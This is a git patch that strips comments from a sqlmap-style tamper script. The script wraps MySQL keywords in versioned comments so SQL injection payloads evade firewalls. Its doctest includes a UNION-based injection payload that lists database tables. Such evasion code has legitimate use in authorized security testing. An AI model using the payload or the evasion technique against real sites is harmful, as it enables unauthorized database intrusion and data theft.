From d09fe4e5b1210c77a96827b82be96872f2615c61 Mon Sep 17 00:00:00 2001 From: Pinoy Vendetta Date: Tue, 1 Jul 2025 14:59:47 +0800 Subject: [PATCH] Update mysqlversioncomment.py --- tamper/mysqlversioncomment.py | 24 ------------------------ 1 file changed, 24 deletions(-) diff --git a/tamper/mysqlversioncomment.py b/tamper/mysqlversioncomment.py index 538e1e000..9ca45ce23 100644 --- a/tamper/mysqlversioncomment.py +++ b/tamper/mysqlversioncomment.py @@ -12,9 +12,6 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies(): - """ - This tamper script does not have any dependencies. - """ pass def tamper(payload, **kwargs): @@ -36,12 +33,7 @@ def tamper(payload, **kwargs): >>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()") '1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/' """ - - # A comprehensive list of keywords and functions to be commented - # Using a dictionary to allow for specific replacements if needed, - # though here we use a generic replacement pattern. keywords = { - # DML & DDL "SELECT": "/*!50000SELECT*/", "UNION": "/*!50000UNION*/", "INSERT": "/*!50000INSERT*/", @@ -54,15 +46,11 @@ def tamper(payload, **kwargs): "LIMIT": "/*!50000LIMIT*/", "ALL": "/*!50000ALL*/", "DISTINCT": "/*!50000DISTINCT*/", - - # Information Schema "INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/", "INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/", "TABLE_NAME": "/*!50000TABLE_NAME*/", "COLUMN_NAME": "/*!50000COLUMN_NAME*/", "TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/", - - # Functions "CONCAT": "/*!50000CONCAT*/", "CONCAT_WS": "/*!50000CONCAT_WS*/", "GROUP_CONCAT": "/*!50000GROUP_CONCAT*/", @@ -74,8 +62,6 @@ def tamper(payload, **kwargs): "ORD": "/*!50000ORD*/", "BENCHMARK": "/*!50000BENCHMARK*/", "SLEEP": "/*!50000SLEEP*/", - - # System Information Functions "DATABASE()": "/*!50000DATABASE()*/", "USER()": "/*!50000USER()*/", "SESSION_USER()": "/*!50000SESSION_USER()*/", @@ -83,8 +69,6 @@ def tamper(payload, **kwargs): "VERSION()": "/*!50000VERSION()*/", "@@VERSION": "/*!50000@@VERSION*/", "@@HOSTNAME": "/*!50000@@HOSTNAME*/", - - # Other keywords "SEPARATOR": "/*!50000SEPARATOR*/", "HAVING": "/*!50000HAVING*/", "INTO": "/*!50000INTO*/", @@ -96,21 +80,13 @@ def tamper(payload, **kwargs): ret_val = payload if payload: - # Sort keywords by length, descending, to replace longer matches first (e.g., 'GROUP BY' before 'BY') - # This prevents partial replacements. sorted_keywords = sorted(keywords.keys(), key=len, reverse=True) for keyword in sorted_keywords: - # Use a regular expression with word boundaries (\b) to avoid replacing - # keywords that are part of other words (e.g., 'IN' in 'INFORMATION_SCHEMA'). - # We handle functions with parentheses separately to avoid issues with word boundaries. if "()" in keyword: - # For functions, we need to escape the parentheses for regex regex_keyword = re.escape(keyword) ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val) else: - # For other keywords, use word boundaries ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val) return ret_val -